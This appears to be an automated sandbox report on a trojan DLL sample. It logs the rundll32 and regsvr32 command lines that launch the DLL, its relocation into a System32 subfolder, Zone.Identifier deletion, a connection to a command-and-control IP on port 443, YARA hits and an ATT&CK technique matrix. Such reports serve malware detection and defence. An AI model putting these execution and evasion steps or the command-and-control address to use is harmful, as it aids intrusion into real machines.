                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292C18C6_2_0292C18C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029297B06_2_029297B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291E3B46_2_0291E3B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029135B86_2_029135B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292ABBC6_2_0292ABBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029143A06_2_029143A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029329A06_2_029329A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029319AC6_2_029319AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02933FD86_2_02933FD8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029353DC6_2_029353DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292B7C46_2_0292B7C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02922BF06_2_02922BF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029271F06_2_029271F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02919BF86_2_02919BF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291B1E06_2_0291B1E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029185EC6_2_029185EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02923F186_2_02923F18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292051C6_2_0292051C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02912B046_2_02912B04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291AB086_2_0291AB08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02917B306_2_02917B30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291E5346_2_0291E534
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029199386_2_02919938
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292D93C6_2_0292D93C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292373C6_2_0292373C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291DD206_2_0291DD20
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292F3206_2_0292F320
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029313206_2_02931320
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02929F246_2_02929F24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02923B286_2_02923B28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029325286_2_02932528
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02919D506_2_02919D50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029213506_2_02921350
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029311506_2_02931150
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291AF546_2_0291AF54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029281546_2_02928154
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02931F546_2_02931F54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291175C6_2_0291175C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291CF5C6_2_0291CF5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02926F5C6_2_02926F5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0292115C6_2_0292115C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02924D406_2_02924D40
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291D1486_2_0291D148
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02926D486_2_02926D48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02935F486_2_02935F48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291F54C6_2_0291F54C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_029153606_2_02915360
                        Source: C:\Windows\System32\regsvr32.exeCode function: String function: 0000000180037D34 appears 44 times
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                        Source: 5CUFfVMSaQ.dllStatic PE information: Number of sections : 12 > 10
                        Source: 5CUFfVMSaQ.dllVirustotal: Detection: 21%
                        Source: 5CUFfVMSaQ.dllMetadefender: Detection: 45%
                        Source: 5CUFfVMSaQ.dllReversingLabs: Detection: 80%
                        Source: 5CUFfVMSaQ.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll"
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedx
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQg
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll"
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscB
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedxJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQgJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscBJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll"Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                        Source: classification engineClassification label: mal96.troj.evad.winDLL@20/5@0/27
                        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285BA54 Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,2_2_0285BA54
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                        Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                        Source: 5CUFfVMSaQ.dllStatic PE information: More than 133 > 100 exports found
                        Source: 5CUFfVMSaQ.dllStatic PE information: Image base 0x180000000 > 0x60000000
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007CB0E push rsp; retf 2_2_000000018007CB1F
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007CEE0 push rsp; retf 2_2_000000018007CEFF
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007D180 push rsp; retf 2_2_000000018007D19F
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002D2C9 push rdi; ret 2_2_000000018002D2D2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007D420 push rsp; retf 2_2_000000018007D43F
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007D7C0 push rsp; retf 2_2_000000018007D7DF
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002D8FD push rdi; ret 2_2_000000018002D904
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285B61A push ebp; retf 2_2_0285B61E
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285B540 push esi; iretd 2_2_0285B541
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285AE42 push ebp; iretd 2_2_0285AE43
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291236C push esp; retf 6_2_02912383
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .00cfg
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .gehcont
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .gxfg
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .retplne
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .voltbl
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: _RDATA
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll
                        Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\NCybOKcMqaEIN\jnEWIdoCfnPf.dllJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 4224Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 6220Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 4140Thread sleep time: -150000s >= -30000sJump to behavior
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeAPI coverage: 4.4 %
                        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800426C8 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00000001800426C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800436B4 FindFirstFileExW,2_2_00000001800436B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004383C FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_000000018004383C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180043DBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0000000180043DBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02930A20 FindFirstFileW,FindNextFileW,6_2_02930A20
                        Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: svchost.exe, 0000000C.00000002.837269152.000001FFA505E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@Hyper-V RAW
                        Source: regsvr32.exe, 00000006.00000002.964477134.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502763451.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502855478.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.837250042.000001FFA504C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668175675.0000024E70AF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.667732408.0000024E70A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 0000000E.00000002.964372851.0000027146A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                        Source: svchost.exe, 0000000C.00000002.836872058.000001FF9F829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                        Source: svchost.exe, 0000000E.00000002.964447614.0000027146A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003A8BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000000018003A8BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800385E0 GetProcessHeap,2_2_00000001800385E0
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003A8BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000000018003A8BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003794 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0000000180003794
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003A24 SetUnhandledExceptionFilter,2_2_0000000180003A24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003A34 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0000000180003A34

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 188.165.79.151 443Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_00000001800382D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_00000001800383D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_0000000180038478
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_0000000180050A74
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_0000000180036CD0
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_0000000180050D74
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_0000000180050E44
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_0000000180051090
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_0000000180051128
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_0000000180051230
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_0000000180051290
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_000000018005139C
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_0000000180051470
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180045B10 cpuid 2_2_0000000180045B10
                        Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004050 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_0000000180004050

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964724556.0000000001130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449599584.0000023755221000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448824975.0000025325750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964860380.0000000002911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5CUFfVMSaQ.dll, type: SAMPLE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.965051526.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation1
                        DLL Side-Loading
                        111
                        Process Injection
                        2
                        Masquerading
                        OS Credential Dumping1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        Exfiltration Over Other Network Medium11
                        Encrypted Channel
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        3
                        Virtualization/Sandbox Evasion
                        LSASS Memory41
                        Security Software Discovery
                        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                        Ingress Tool Transfer
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                        Process Injection
                        Security Account Manager3
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Non-Application Layer Protocol
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                        Deobfuscate/Decode Files or Information
                        NTDS2
                        Process Discovery
                        Distributed Component Object ModelInput CaptureScheduled Transfer12
                        Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Hidden Files and Directories
                        LSA Secrets1
                        Remote System Discovery
                        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common2
                        Obfuscated Files or Information
                        Cached Domain Credentials2
                        File and Directory Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Regsvr32
                        DCSync44
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                        Rundll32
                        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                        File Deletion
                        Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 671666 Sample: 5CUFfVMSaQ Startdate: 22/07/2022 Architecture: WINDOWS Score: 96 32 121.247.2.0 TCISLTataCommunicationsIN India 2->32 34 133.247.2.0 SCN-NETSHONANCABLENETWORKJP Japan 2->34 36 23 other IPs or domains 2->36 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 2->48 50 2 other signatures 2->50 8 loaddll64.exe 1 2->8         started        10 svchost.exe 9 1 2->10         started        13 svchost.exe 2->13         started        15 3 other processes 2->15 signatures3 process4 dnsIp5 17 regsvr32.exe 5 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 8->22         started        24 2 other processes 8->24 38 127.0.0.1 unknown unknown 10->38 process6 signatures7 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->42 26 regsvr32.exe 17->26         started        30 rundll32.exe 20->30         started        process8 dnsIp9 40 188.165.79.151, 443, 49772 OVHFR France 26->40 52 System process connects to network (likely due to code injection or exploit) 26->52 signatures10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        5CUFfVMSaQ.dll21%VirustotalBrowse
